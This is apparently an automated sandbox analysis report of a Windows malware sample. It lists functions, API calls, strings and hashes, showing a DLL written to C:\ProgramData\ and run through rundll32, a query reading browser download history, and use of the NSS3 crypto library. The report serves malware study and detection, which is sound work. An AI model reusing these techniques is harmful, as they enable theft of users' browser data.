Instruction ID: 79b6b52e18f396a1998507d11fcfc5ed9294b2d786b8a7e60c61e36761a510aa
Opcode Fuzzy Hash: 1121000fab4ae4b7b46dacaf05a59839db540d315217b281d27a86876e0e8904
Instruction Fuzzy Hash: 170182B6A012015FDF04DE15FC00C467A61BB1236D7164379E82647BA1E722ED39CAC6

Function 006245AF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

ShellExecuteEx.SHELL32(?), ref: 006247D6

Strings

.dll, xrefs: 0062463A
C:\ProgramData\, xrefs: 006245E2
C:\Windows\system32\rundll32.exe, xrefs: 00624730
"" , xrefs: 0062467F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: 73bc84b77f1c9d332ba7afcbb57340291258a54f7d77d05b3d4ab5e3ab50b8f8
Instruction ID: 3e9c139750d60df4ddffda227fe3534a7e0481d991811fa517454e78e22b2c8f
Opcode Fuzzy Hash: 73bc84b77f1c9d332ba7afcbb57340291258a54f7d77d05b3d4ab5e3ab50b8f8
Instruction Fuzzy Hash: BE71FE32D0052AAACF50FBA5EC529CDB7BAAF04300F554469FA10B7122DB316F5ACF94

Function 6C42FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C42FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C42FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C42FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C42FDDE

Part of subcall function 6C438800: TlsGetValue.KERNEL32(?,6C44085A,00000000,?,6C3E8369,?), ref: 6C438821
Part of subcall function 6C438800: TlsGetValue.KERNEL32(?,?,6C44085A,00000000,?,6C3E8369,?), ref: 6C43883D
Part of subcall function 6C438800: EnterCriticalSection.KERNEL32(?,?,?,6C44085A,00000000,?,6C3E8369,?), ref: 6C438856
Part of subcall function 6C438800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C438887
Part of subcall function 6C438800: PR_Unlock.NSS3(?,?,?,?,6C44085A,00000000,?,6C3E8369,?), ref: 6C438899

Strings

pkcs11:, xrefs: 6C42FC4F

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 2a17c8692f95de6a0c0495ea123140ed52bc518da63ec6e41cd7284c6e129626
Instruction ID: eaf2a640acbbc513b7e6813c9b5b8bf5fffb7ee71cedf86ce6f64fb98ec00582
Opcode Fuzzy Hash: 2a17c8692f95de6a0c0495ea123140ed52bc518da63ec6e41cd7284c6e129626
Instruction Fuzzy Hash: F95102B2A121319BFB00DE26DC42F9A7365BF4435DF950029DD0A9BB41EB29E805CBD2

Function 6C36BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C36BE02

Part of subcall function 6C499C40: memcmp.VCRUNTIME140(?,00000000,6C36C52B), ref: 6C499D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C36BE9F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C36BE89
database corruption, xrefs: 6C36BE93
%s at line %d of [%.10s], xrefs: 6C36BE98

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 15a5450a6e164796a4afd4dca473ce00a9d387e5e60155619075a72c0569ff3c
Instruction ID: 6f8150c331d46f419b2766787f8a19cf766eac71f68287bfd851eb3f6d0f6583
Opcode Fuzzy Hash: 15a5450a6e164796a4afd4dca473ce00a9d387e5e60155619075a72c0569ff3c
Instruction Fuzzy Hash: DE310431A482558BC700CF6AE8D4AABBBA5AF4131CB098554FA981FE45D375EC04DFE1

Function 6C456DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C456E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C456E57

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C456E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C456EAA

Strings

nOl, xrefs: 6C456DF9

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nOl
API String ID: 3163584228-2462765745
Opcode ID: bb3160fa8241e01aedc22680e2178952fcb5b69fc2b983ea5310d7d86c189388
Instruction ID: 4dbbbb3fddc71ff5da488580522df3a548788e49cfd78ee79b06043814296991
Opcode Fuzzy Hash: bb3160fa8241e01aedc22680e2178952fcb5b69fc2b983ea5310d7d86c189388
Instruction Fuzzy Hash: 8E31E172712512EEDB149E34DC04FD6B7A5AB1131BFA0063CD899D6B80EB31A4A9CF81

Function 00620197 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 006201AD

Part of subcall function 006404C5: std::exception::exception.LIBCMT ref: 006404DA
Part of subcall function 006404C5: __CxxThrowException@8.LIBCMT ref: 006404EF
Part of subcall function 006404C5: std::exception::exception.LIBCMT ref: 00640500

std::_Xinvalid_argument.LIBCPMT ref: 006201CC
_memmove.LIBCMT ref: 00620208

Strings

string too long, xrefs: 006201C7
invalid string position, xrefs: 006201A8

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: b8c00055734352e8e5c61880cc2260862cbf84022b25acd91fc3eb8874e6ed47
Instruction ID: da6c43d9a597fb8c0e044424843b7c209bf3f2bc5868a36db014bc65d984657b
Opcode Fuzzy Hash: b8c00055734352e8e5c61880cc2260862cbf84022b25acd91fc3eb8874e6ed47
Instruction Fuzzy Hash: 0E119131300B209FEB24DE9CE8C9A55B3E7EB04714B10095DF952CB783C7B0E9448B94

Function 6C3D0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C3D0BDE), ref: 6C3D0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C3D0BDE), ref: 6C3D0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C3D0BDE), ref: 6C3D0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C3D0BDE), ref: 6C3D0E32

Strings

%s incr => %d (find lib), xrefs: 6C3D0E2D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 6c116e6c96cad675ea0d3a5c16d06f73ca2237bf18c2edcde55ad7e3d4a211a1
Instruction ID: 5a0b9733fa7dc7e981036ad029396468add81904f5efc645a5de4089534bdd7d
Opcode Fuzzy Hash: 6c116e6c96cad675ea0d3a5c16d06f73ca2237bf18c2edcde55ad7e3d4a211a1
Instruction Fuzzy Hash: 5001F1726006209FE620DF24DC85E17B3ECDB85B0AB06442DE949D3A41E762FC188AE2

Function 6C411CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C411CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C411CF1

Part of subcall function 6C4F09D0: PR_Now.NSS3 ref: 6C4F0A22
Part of subcall function 6C4F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C4F0A35
Part of subcall function 6C4F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C4F0A66
Part of subcall function 6C4F09D0: PR_GetCurrentThread.NSS3 ref: 6C4F0A70
Part of subcall function 6C4F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C4F0A9D
Part of subcall function 6C4F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C4F0AC8
Part of subcall function 6C4F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C4F0AE8
Part of subcall function 6C4F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4F0B19
Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4F0B48
Part of subcall function 6C4F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4F0C76
Part of subcall function 6C4F09D0: PR_LogFlush.NSS3 ref: 6C4F0C7E

Strings

nOl, xrefs: 6C411D09, 6C411D30
pInitArgs = 0x%p, xrefs: 6C411CEC
C_Initialize, xrefs: 6C411CD3

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize$nOl
API String ID: 1907330108-1355782176
Opcode ID: d977d7cd104c3f1b860e77dfd0941130916febc65499f5878745393dc15d2203
Instruction ID: 5e476606e40cf308a816330bc328752b47e0ef638deb2909b11bf562a0974c6b
Opcode Fuzzy Hash: d977d7cd104c3f1b860e77dfd0941130916febc65499f5878745393dc15d2203
Instruction Fuzzy Hash: F1018C75205150DFDB00FB64DD48F6933B5EBD231EF1A8429E849D2F11EB34E849CA96

Function 6C48AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]Gl,00000000,?,?,6C466AC6,?), ref: 6C48AC2D

Part of subcall function 6C42ADC0: TlsGetValue.KERNEL32(?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE10
Part of subcall function 6C42ADC0: EnterCriticalSection.KERNEL32(?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE24
Part of subcall function 6C42ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C40D079,00000000,00000001), ref: 6C42AE5A
Part of subcall function 6C42ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE6F
Part of subcall function 6C42ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE7F
Part of subcall function 6C42ADC0: TlsGetValue.KERNEL32(?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AEB1
Part of subcall function 6C42ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AEC9

PK11_FreeSymKey.NSS3(?,@]Gl,00000000,?,?,6C466AC6,?), ref: 6C48AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]Gl,00000000,?,?,6C466AC6,?), ref: 6C48AC59
free.MOZGLUE(8CB6FF01,6C466AC6,?,?,?,?,?,?,?,?,?,?,6C475D40,00000000,?,6C47AAD4), ref: 6C48AC62

Strings

@]Gl, xrefs: 6C48AC05

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]Gl
API String ID: 1595327144-621334131
Opcode ID: 1b47f2d0137231e66aedfaf8ecc498005b8c2573964d0523b4fdb78083633aea
Instruction ID: 692250626a0c87bfd2c4625382e5f0892e690c96ed4ff569342e8cb13e906681
Opcode Fuzzy Hash: 1b47f2d0137231e66aedfaf8ecc498005b8c2573964d0523b4fdb78083633aea
Instruction Fuzzy Hash: B001ADB56012009FDB10DF19E8C0F4677A8EF44B1DF1880A8ED098F746E734E808CBA1

Function 00623DFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(lb,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00626CE9,?), ref: 00623E18
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00626CE9,?), ref: 00623E30
CloseHandle.KERNEL32(00000000,?,?,?,00626CE9,?), ref: 00623E3B
CloseHandle.KERNEL32(00000000,?,?,?,00626CE9,?), ref: 00623E43

Strings

lb, xrefs: 00623E15

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID: lb
API String ID: 4148174661-2395320387
Opcode ID: e186bd6a94c4ec83ae80b819ab86fde7e119b48d2e5e45521777c7cfe65ff329
Instruction ID: ec86a42e2d1231228a0db4450842b7046548ab6901debf00070e27edc671b675
Opcode Fuzzy Hash: e186bd6a94c4ec83ae80b819ab86fde7e119b48d2e5e45521777c7cfe65ff329
Instruction Fuzzy Hash: A2F08231641725FBE7209760EC09FDA7A6EFB09761F114211FA51A22D0EB74AB068A60

Function 6C379C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C379CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C379D45
EnterCriticalSection.KERNEL32(?), ref: 6C379D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C379DDE

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ef4481473154c1819ed3430e0fcc4dc1e0b30c054077a7938de303a7d7b410b2
Instruction ID: ba57f4d3b725b05d199d13ad553d1c7a54fdf6be58921ebf2042abb46f721c76
Opcode Fuzzy Hash: ef4481473154c1819ed3430e0fcc4dc1e0b30c054077a7938de303a7d7b410b2
Instruction Fuzzy Hash: 53A174317442008BEB28AF24ED8977A3775AB47719F19421DD40A4BB40EB3ED855CFAA

Function 00619ECA Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

lstrlenA.KERNEL32(?), ref: 0061A0CE
lstrlenA.KERNEL32(?), ref: 0061A0E9

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Strings

Downloads, xrefs: 00619EF4
Downloads, xrefs: 00619F4B
SELECT target_path, tab_url from downloads, xrefs: 00619FDC

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 6fd33179ac249cdd3d07aa254dde60dfe71d6476cc4c1ffa6e91e2f13a759678
Instruction ID: 23030d53730db52d993857c7330fb483d62bf354c49b2f9d837e1883a8c941cf
Opcode Fuzzy Hash: 6fd33179ac249cdd3d07aa254dde60dfe71d6476cc4c1ffa6e91e2f13a759678
Instruction Fuzzy Hash: C971FA32E0012AEBCF40FBA9ED579DD777AAF04311F550425FA00B7162CB216FA68B55

Function 6C48DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C48DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C48DE77

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
